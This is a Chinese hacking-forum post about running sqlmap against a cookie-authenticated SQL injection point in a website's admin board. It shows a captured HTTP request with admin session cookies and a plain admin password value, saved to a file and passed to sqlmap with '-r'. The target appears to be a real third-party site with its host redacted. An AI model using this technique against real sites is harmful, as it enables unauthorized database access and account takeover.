切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
283 SQLMAP 后台验证[复制链接]
发表于 2012-10-7 20:45:15 | 显示全部楼层 |!read_mode!
某些WEB程序在用户界面或者管理界面设置的安全系数不大,前台安全系数很严格,或许我们抓到个某个Bug,他用是COOKIES认证

经过burpsuite各种FUZZ报错,这应该是个SQL注入点


咋办呢?手工吧?自己不是Helen那一级别的大神,看到注入只会–level5 再加 –risk=5,
直接丢输入工具因为验证的问题访问不了,可以把数据包保存下来
  1. E:\tools\SQL Tool\sqlmap>cat 1.txt
  2. GET /admin/board/board.php?code=1&category=&active=board_view&page=1&keyfield=&key=&uid=170 HTTP/1.1

  3. Accept: text/html, application/xhtml+xml, */*
  4. Referer: http://XXXXXXX.XX/admin/main.php
  5. Accept-Language: zh-CN
  6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
  7. Accept-Encoding: gzip, deflate
  8. Host: XXXXXXX.XX
  9. Proxy-Connection: Keep-Alive
  10. Cookie: PHPSESSID=a4cc27cfe8a662cb0feda14a9d0eb321; COOKIE_ADMIN=admin; COOKIE_ADMINKEY=rhsObHmHBIDR
  11. w; COOKIE_ADMINNAME=%B0%FC%B8%AE%C0%DA; COOKIE_ADMINPASS=1234; COOKIE_ADMIN_A_=1%2C2%2C3%2C4; COOKIE
  12. _ADMIN_B_=1%2C2%2C3%2C4; COOKIE_ADMIN_C_=1%2C2%2C3%2C4; COOKIE_ADMIN_D_=1%2C2%2C3%2C4; COOKIE_ADMIN_
  13. E_=1%2C2%2C3%2C4; COOKIE_ADMIN_F_=1%2C2%2C3%2C4
  14. E:\tools\SQL Tool\sqlmap>
复制代码

直接丢SQLMAP , Sqlmap -r data.txt




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-29 22:17

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部